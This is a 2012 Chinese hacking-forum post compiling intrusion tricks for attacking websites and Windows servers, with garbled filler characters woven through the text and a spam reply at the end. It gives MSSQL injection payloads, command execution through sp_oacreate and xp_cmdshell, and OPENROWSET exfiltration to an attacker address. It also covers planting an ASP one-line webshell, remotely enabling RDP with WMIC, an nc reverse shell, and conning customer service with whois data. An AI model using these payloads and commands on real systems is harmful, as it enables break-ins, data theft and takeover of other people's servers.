找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3218|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关
9 W5 H3 I" F0 K& _' N3 q) u: \- T7 K" A0 O& i

9 V, l9 N% g+ jSA点数据库分离搞法+语句:
7 T" t5 B+ i0 @1 \% Y; G, t$ \6 ]* p6 a! Q* N3 I$ h( }
注射点不显错,执行下面三条语句页面都返回正常。# Y. z* a2 D* Z- O
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread'): b: J6 {% G' ~4 a3 |
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
- i* \6 Q# v, s2 b' z5 E! L. M& Iand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
5 Q. V4 Q9 y* U$ s# S可以列目录,判断系统为2000,web与数据库分离2 [$ Z" S6 B* x
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。7 u9 O. Y3 a8 p8 [# G. d) p
在注射点上执行
7 _1 j1 m- u+ v! N4 e; \5 s8 w' edeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--; j  V# {8 v. z+ V
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
  V- a0 i- _0 w; z. U* q2 p) A还有我用NC监听得其他端口都没有得到IP。+ Z! ~4 ~  N2 |0 K# A$ J

5 W% G4 f  v' A通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。$ ]" T9 {' O5 @: v4 t+ W/ h$ a
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
7 g' O0 o' o, C: m. L- H+ u+ O, z# ^5 o5 ?) t0 W2 z2 X% [
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
  Q8 M) N2 J! J
6 [( j& b  N2 n9 ^现在就猜想是不是数据库是内网而且不能连外网。
* \  G# P; i( D) d7 u
8 o6 r8 [/ h' A" m% y
6 y3 T  y! y1 F* \& C+ W  Faccess导出txt文本代码
5 J- B# n2 v9 G+ N$ ]SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
( R6 p' Y7 f; N7 g* o
+ p, Z: s7 x8 C/ H
: E  f6 b% l9 \  o" M  ^
7 K$ o& o9 u7 X- d" `6 c自动跳转到指定网站代码头8 I" v0 a- E& w4 o. h. T- A
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
# t5 A) v% ]2 U0 E  [3 S6 \: h/ O
1 `' r* j; R- `: q, j+ c" Y2 j) E. x6 Z
入侵java or jsp站点时默认配置文件路径:
2 [( l2 \' E1 G+ e0 Q! n\web-inf\web.xml
" B0 A! i+ F( O' Ptomcat下的配置文件位置:0 {7 {5 A/ s$ D% d- I
\conf\server.xml            (前面加上tomcat路径)/ u2 p8 [8 x( u+ ^& K4 J
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
9 V" E" G8 j* R4 x. h  B- V9 \( b9 R; o  T; H0 ~- a

, A9 R8 u: P$ s4 u, {
- s  {  X3 C2 v2 a检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
$ C2 }7 X# }! Q+ |3 x6 |: J-1%23( ~% h: {% P; i1 v# t# v
> 7 Y  H* z5 _9 L# w
<
# ~/ \% |' F0 e: }$ D6 c# ~1'+or+'1'='1
$ [! D; \- G3 q  H7 Fid=8%bf( k2 k' V9 ?7 X. J# H1 P% G/ I

, l2 k* |- H  g% h4 M/ C8 q+ z* M全新注入点检测试法:
0 a, B0 ]/ s! M+ X, f, e, C5 \  ]2 \在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。4 L: u/ w  H& w, q5 J: P$ D

7 X) B: m2 S% D/ L. ]/ k在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
- q( n+ X  K( n2 s
; m' N/ b" ~% Q' l搜索型注入判断方法:: r' h' Y  w( ~! i. b2 w+ c' o# U
北京%' and '1'='1' and '%'='
/ l' H6 ?, v0 P/ ~北京%' and '1'='2' and '%'='
! \0 p$ ]$ B" z" j; Q- G9 T! p' e  i$ F

# E; e* H- p( _. A# I9 e" o5 JCOOKIES注入:2 c" ~6 a- |, W! J0 A

9 _( W$ L' U) S( Ojavascript:alert(document.cookie="id="+escape("51 and 1=1"));
. R8 n2 V; X. X2 a: M
. H3 R- t  d9 A& p" C4 r' D3 ]; F( r2000专业版查看本地登录用户命令:- Z: Q* @& f3 f# D, h! F2 w
net config workstation
* r' |4 m! e5 T
; m1 o2 b& A+ w* f) w: b2 j7 ^$ ], F5 R7 I5 }
2003下查看ipsec配置和默认防火墙配置命令:
& i: h- u1 T* H. _5 Vnetsh firewall show config
- b$ X5 L6 a0 Knetsh ipsec static show all
9 H/ h% }5 ^$ L5 y1 d6 [% [
6 ^9 y: Z0 B+ `4 ?. M) r不指派指定策略命令:
+ S( c$ L6 p5 E2 R; p; l8 P$ qnetsh ipsec static set policy name=test assign=n  (test是不指派的策略名)+ @5 r! ~* K  D" Z* e
netsh ipsec static show policy all  显示策略名
- @" M3 ^& _; Y1 P: q* q* W+ ~  @7 S$ J$ Y& b
/ B0 L) K0 N" l' e# |( F% u
猜管理员后台小技巧:
1 X) |+ \; j0 ?. Ladmin/left.asp / K( j, W9 x4 h8 K9 f  S
admin/main.asp" a* p* N* ?2 R/ g5 x
admin/top.asp' j3 I1 P5 Z. ^) Q) Y
admin/admin.asp ( P9 X' o4 M1 W- D
会现出菜单导航,然后迅雷下载全部链接+ U1 g  k, [& h: c7 V5 W& K
+ k* B1 p  y" F, i, a3 ~6 Y! A$ f
6 u, y* u. C" {' ^
社会工程学:
% X. G3 b% Z5 q$ ~: j5 H用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人/ @$ U1 r: Q  n) o7 d- V- _
然后去骗客服" P6 Q7 u7 ~" P! H9 c2 V  R
3 |8 x5 `) v) a! f) \2 f
) R, Z3 z6 U' S) s' q
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: . [2 m- G5 p2 J8 {: K. n# Y* h
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, & S3 m3 A! k3 B" L" q3 m
  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
% I; r3 m7 ^5 [& N* d4 r. {0 H
  y4 W; Q9 Z* \7 f$ i- J

+ ^# C- X* W% D6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
, R8 W: w1 o( A1 d; j  y2 K+ v$ m
2 s' l# E6 H  L5 C, K
6 Z: }& \! u. w: r3 H, h
- T$ t/ ?7 L3 ]CMD加密注册表位置
- v. s; q. ?: I(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
8 F& }' G- Z2 f6 \AutoRun
# B* J- n3 p; L% l3 s
2 K; b0 @. ^. K0 _(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor3 o8 I) M, h4 ^$ H0 U; j4 P! K
AutoRun  ~# R8 E8 c7 Y3 c/ O* P( f# p
' L. \5 W  ~% d3 X* |9 ]

/ q" H% }+ Y, L1 t7 D7 ?& K% a在找注入时搜索Hidden,把他改成test
2 B7 |1 w1 _9 r
4 z5 j+ q  i5 S1 r) _  z6 U& }/ I& j$ J! O5 S1 M% w( {: u

1 K6 r  t! J  H9 @3 r  I: B. Wmstsc /v:IP /console 2 C" X- q- F/ n! W: \# E
+ V/ t4 n7 ~) ~8 w1 a: `
4 K, Q7 A1 i# _- r, Y
一句话开3389:- X0 F5 W  f$ `7 j3 O# H
7 Q7 K" ~: L9 g! @. _1 m
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  4 `9 B6 P+ }7 y' \! K3 x
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
+ Y$ c3 p5 G- _+ S( C
# ~# U4 ^  J* v* b
5 x5 N" Z9 O" H7 M5 |8 Y知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
. F: D# @3 N+ l0 y0 vInsert into admin(user,pwd) values('test','test')
! U0 ~* j. J+ l6 D/ L" W+ J7 K% u
& G0 P5 l6 g1 B8 N8 n* d( Q; j1 H  i6 ~( r4 F5 @4 j
NC反弹
# H  U* F- I  D2 |先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
) }4 t- b! M& ^8 e6 }7 A) {$ D* ]! y然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)$ J! K( p: f" y% Y: t
4 D' T/ v( y/ `1 `) I
0 A+ \3 f; ^* K: [! z4 g3 G
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
: q( m7 L8 {4 V2 h: \# F6 M
0 A1 T# l' G+ G0 P' T有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录; b, v, P' T- [' l
例如:
3 j& o; e7 p( A+ S/ G( \0 asubst k: d:\www\ 用d盘www目录替代k盘
/ _7 v. h0 Q$ }$ P" h) Psubst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表